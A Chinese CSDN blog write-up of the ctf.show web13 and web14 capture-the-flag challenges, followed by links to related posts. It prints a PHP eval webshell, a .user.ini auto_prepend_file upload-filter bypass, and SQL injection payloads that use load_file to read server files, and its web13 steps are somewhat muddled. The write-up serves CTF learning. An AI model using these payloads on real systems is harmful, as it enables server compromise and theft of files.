ctfweb入门(13-14)

最新推荐文章于 2024-07-05 23:15:43 发布
最新推荐文章于 2024-07-05 23:15:43 发布
阅读量756 收藏 1
点赞数 1
文章标签: php 安全 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_62046696/article/details/125267639
版权

ctf.show_web13

进入题目是个文件上传的题目,尝试了一番文件上传漏洞利用的方法后,没有啥突破,可能有啥隐藏的目录,尝试源码泄露利用的方法,在输入upload.php.bak时成功下载下来源码。
.bak文件是备份文件。
这里列举一下常见的源码泄露
.hg源码泄漏 .git源码泄漏 .DS_Store文件泄漏,还有以.phps .bak结尾的网页
在web题没有头绪的时候可以尝试可能会有奇效。
源码如下:

<?php 
	header("content-type:text/html;charset=utf-8");
	$filename = $_FILES['file']['name'];
	$temp_name = $_FILES['file']['tmp_name'];
	$size = $_FILES['file']['size'];
	$error = $_FILES['file']['error'];
	$arr = pathinfo($filename);
	$ext_suffix = $arr['extension'];
	if ($size > 24){
		die("error file zise");
	}
	if (strlen($filename)>9){
		die("error file name");
	}
	if(strlen($ext_suffix)>3){
		die("error suffix");
	}
	if(preg_match("/php/i",$ext_suffix)){
		die("error suffix");
    }
    if(preg_match("/php/i"),$filename)){
        die("error file name");
    }
	if (move_uploaded_file($temp_name, './'.$filename)){
		echo "文件上传成功!";
	}else{
		echo "文件上传失败!";
	}

 ?>

文件的大小要小于等于24,名字长度小于等于9,后缀长度小于等于3,并且最要命的是后缀和名字都不能包含php。我们肯定是要上传一句话木马的,既然小于等于24可以这样写<?php eval($_POST['a']);正好24字节可以满足,但是由于后缀问题服务器无法解析该php语句。这里用一种特殊的手法来绕过。
1.我们先将一句话保存为1.txt。
2.上传1.txt
3上传.user.ini文件。
对于php中的.user.ini有如下解释:
PHP 会在每个目录下搜寻的文件名;如果设定为空字符串则 PHP 不会搜寻。也就是在.user.ini中如果设置了文件名,那么任意一个页面都会将该文件中的内容包含进去。
我们在.user.ini中输入auto_prepend_file =a.txt,这样在该目录下的所有文件都会包含a.txt的内容、

 那就直接构造参数吧,这里用post发送,我get试过了,不行,

查看当前目录有哪些文件:a=print_r(glob("*"));

a=highlight_file("903c00105c0141fd37ff47697e916e53616e33a72fb3774ab213b3e2a732f56f.php");


information_schema.`tables`一个过滤手段information_schema.`columns`,同理

apache的默认网站根路径是 /var/www/html, 我们试一下读这个文件的内容

load_file('/var/www/html/secret.php'),加载文本文件读取信息。

web14

<?php
include("secret.php");

if(isset($_GET['c'])){
    $c = intval($_GET['c']);
    sleep($c);
    switch ($c) {
        case 1:
            echo '$url';
            break;
        case 2:
            echo '@A@';
            break;
        case 555555:
            echo $url;
        case 44444:
            echo "@A@";
            break;
        case 3333:
            echo $url;
            break;
        case 222:
            echo '@A@';
            break;
        case 222:
            echo '@A@';
            break;
        case 3333:
            echo $url;
            break;
        case 44444:
            echo '@A@';
        case 555555:
            echo $url;
            break;
        case 3:
            echo '@A@';
        case 6000000:
            echo "$url";
        case 1:
            echo '@A@';
            break;
    }
}

highlight_file(__FILE__)

打开界面发现switch函数,遇到break才会停止,又因为有sleep所以时间应该小一点,直接?c=3

 访问

 感觉是一个注入漏洞,然后输入true  false返回值不一样,说明是数值型漏洞

CTFshow web14_Je3Z的博客-CSDN博客

到这我们发现数据库中并没有我们想要的flag,但是有一条提示tell you a secret,secert has a secret…. 所以很有可能flag在secret.php中,然后mysql提供了读取本地文件的函数load_file(),但是要权限,用user()看一下权限是root可以用load_file()读
 

?query=-1/**/union/**/select/**/load_file('/var/www/html/secret.php')

从这可以看出过滤的名字,然后query需要用get方法赋值

 

?query=-1/**/union/**/select/**/load_file('/real_flag_is_here')

就可以得出flag

偶尔躲躲乌云334
关注
CTFshow 信息收集 web14
Kradress的博客
10-23 303
根据提示 有时候源码里面就能不经意间泄露重要(editor)的信息,默认配置害死人 0day:某编辑器最新版默认配置下,如果目录不存在,则会遍历服务器根目录 查看网页源代码,根据提示搜索editor,发现有这个路径下的图片 访问http://8756a53b-3dca-4e09-8f60-8ac075e913ac.challenge.ctf.show/editor/ 发现编辑器,尝试上传后门 不能上传文件,点击旁边的文件空间,发现flag ...
ctfshow web入门 web14
weixin_59560134的博客
05-11 953
根据题目提示查看源代码,发现编辑器路径 在url中输入/editor得到 点击文件上传发现文件空间可能有内容 /editor/attached/file/var/www/html/nothinghere/fl000g.txt 访问 /fl000g.txt拿到flag ctfshow{8be17f6c-7a13-419b-ada0-f5f1549b3ede} ...
ctfshow-萌新-web14( 曲线救国-POST请求绕过获取网站敏感信息)
热门推荐
wangyuxiang946的博客
09-12 1万+
ctf.show萌新模块 web14关, 此关卡是一个代码执行漏洞, 重点在于命令执行函数的利用方式, 源码中过滤比较严格, 尤其是过滤了分号;之后, 虽然可以用?>来代替分号, 但这样一来就只能执行一行代码, 难度较大, 需要注意的是, 源码中的过滤只针对GET请求的参数, 而未对POST请求的参数做限制, 这里推荐曲线救国,GET请求传递一句话木马, 然后在POST请求中传递参数执行系统命令, 从而获取 flag 来到页面后展示了部分源码, 并提示 flag 就在 config....
CTFSHOW 萌新web13
最新发布
weixin_44833249的博客
07-05 155
冒号这个过滤可以用?>来绕过,让程序运行到这里就终止,而在php中,最后一句话是不需要用分号;相比于12题 多了冒号:,点.file的匹配。
ctfshow web14
m0_55923820的博客
07-16 1077
ctfshow web 14 解析 这道题比较简单,分值也只有5分,就是一个简单的sql注入。但是这个sql注入的回显你得看它的源代码里才有。但是它把你右击查看源码那个玩意儿给禁了。你需要在你的url前面加view-source:才能看到源码
CTF.show:web14
qq_46230755的博客
01-16 380
打开来后执行语句得到提示 ?c=3 当c为3时,不会退出循环,进而执行下一个case语句得到url here_1s_your_f1ag.php 进入之后发现是一道注入题目 查看源代码发现存在提示 if(preg_match('/information_schema\.tables|information_schema\.columns|linestring| |polygon/is', $_GET['query'])){ die('@A@'); 老样子先爆库名 /here_1s_your_f1ag.
CTF-WEB入门DOC-2019版1
08-03
CTF-WEB入门DOC-2019版1】主要涵盖了CTF竞赛与Web安全相关的基础知识和进阶技能,适合对网络安全有兴趣,尤其是希望在Web安全领域发展的人群。以下将详细介绍其中的关键知识点: 一、CTF简介及目标: CTF...
007-CTF web题型总结-第七课 CTF WEB实战练习(三).pdf
07-09
007-CTF Web题型总结的第七课主要涵盖了三个部分:入门第一部分、入门第二部分-社工篇和入门第三部分-高级篇。这些部分详细介绍了在CTF(Capture The Flag)网络安全竞赛中常见的Web挑战类型,并通过Bugku平台上的...
006-CTF web题型总结-第六课 CTF WEB实战练习(二) .pdf
07-09
本篇内容主要针对CTF Web实战练习进行了总结,分为入门的第一部分和第二部分,涵盖了多个不同类型的题目,旨在帮助学习者提升Web安全攻防能力。 **入门第一部分** 1. **bugku-ctf 第一题:成绩单** 这个题目可能...
CTF---web入门---php
Bad_Monkey的博客
09-19 875
不显示错误 @$a=trim(file_get_contents($b));//@表示 如果脚本中这句话出现的错误,不会将错误输出来 ini_set("display_errors", 0);//更改php.ini配置,错误不会显示 例如: test.php中代码如下 ini_set('display_errors', 0); include('hi.php'); 此时,如果 test.php有错...
ctf web5 练习_CTF-攻防世界-WEB新手练习区 Writeup(12题入门题)
weixin_33603656的博客
01-15 3589
注:作者是CTF初学者,边学习边记录,如有错误或疏漏请批评指正,也请各位大佬多多包涵。攻防世界-WEB新手练习区 12题入门题 Writeup(注意:攻防世界WEB题每次生成场景后,有时flag会改变,因此flag不同不要在意,主要是学习解题思路和方法)0X01view_sourceX老师让小宁同学查看一个网页的源代码,但小宁同学发现鼠标右键好像不管用了。题目提示查看源码,鼠标右键不管用,用F12...
CTFshow web14
Je3Z的博客
04-18 672
<?php include("secret.php"); if(isset($_GET['c'])){ $c = intval($_GET['c']); sleep($c); switch ($c) { case 1: echo '$url'; break; case 2: echo '@A@'; break; case 555555
ctfshow-WEB-web14( 利用数据库读写功能读取网站敏感文件)
wangyuxiang946的博客
09-07 1万+
ctf.show WEB模块第14关是一个SQL注入漏洞, 绕过switch循环后可以拿到一个登录界面, 登录界面存在SQL注入, 脱库以后会提示flag在另一个文件中, 利用数据库的文件读写功能读取文件内容即可拿到flag 开局是一个switch循环, 需要传递参数 c, 参数对应的执行结果有四种: '$url', '@A@', $url, "$url" ; 前两个是字符串, 没啥用, 作者的目的应该是想让我们输出后两个 $url 的其中一个, 但输出之前还有个sleep(), 选的不合适..
ctfshow-web14
HAI_WD的博客
08-26 693
查看一下,发现完整的请求是http://c7ff9ed6-dccd-4d01-907a-f1c61c016c15.challenge.ctf.show/here_1s_your_f1ag.php?首先先测试注入,发现是数字型的,并且空格被处理了,所以直接绕过就行。并且这里看到这里处理的内容就是不让你去读表,类似于这种题目,要嘛就是让你从数据库里找,要嘛就是从文件里找。在index.php中包含了一个secret.php,先读这个文件试试,这里有一个小知识,apache的默认路径是。这道题就是,从文件里找。
刷题之旅第34站,CTFshow web14
cc菜的一批
02-17 2336
感谢ctf show平台提供题目 提交命令,得到了php文件。 ?c=3 我们打开这个php文件看看,是个查询界面。 通过测试,我们发现 information_schema.columns,information_schema.tables均被过滤了,那么可能flag并不是在数据库中。 我们使用sql 的 load_file 命令,进行读文件。在前面我们看到了有个secret.php文件。...
CTFshow的web14
zhong_yan的博客
10-26 352
如图: 信息提示:源码里面就能不经意间泄露重要(editor)的信息 所以我们查看源码 题目说是要查看编辑器 我们搜索一下 果然有,我们来访问一下 是这个界面啊。 我们点击文件上传 我们访问这个浏览器目录啊 直接访问会产生错误,因为这个路径是一个绝对路径 因此,我们可以访问nothinghere/fl000g.txt 即可得到flag ...
ctf.show_web(1-14)wp
qq_73767109的博客
03-28 831
ctf.show_web(1-14) 详细解题思路及部分脚本
CTFSHOW系列-web14(信息收集-editor漏洞)
siu~
11-28 578
CTFSHOW系列解题思路
CTFshow-web-web14
qq_68581192的博客
11-03 224
发现是get传参,变量是c,c的值进入sleep函数等待,c值越大,等待时间越长。进入switch语句判断,所有的case判断完成后break退出,只有到case 3时,继续到case 6000000,然后echo一个$url,如果我们想看c=6000000的值,就要先构造c=3。访问secret.php文件,虽然没有内容,但是没显示报错,说明文件存在,但是读取方法不对,apache的默认网站根路径是 /var/www/html, 我们试一下读这个文件的内容。利用数据库的文件读写功能读取文件内容。
ctfweb入门 文件上传
10-19
攻击者可以通过上传包含Web Shell的文件来获取服务器的控制权,或者上传包含恶意代码的图片文件来实现XSS攻击。 为了防止文件上传漏洞,需要对上传的文件进行过滤和检查。常见的过滤方式包括检查文件类型、文件大小...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值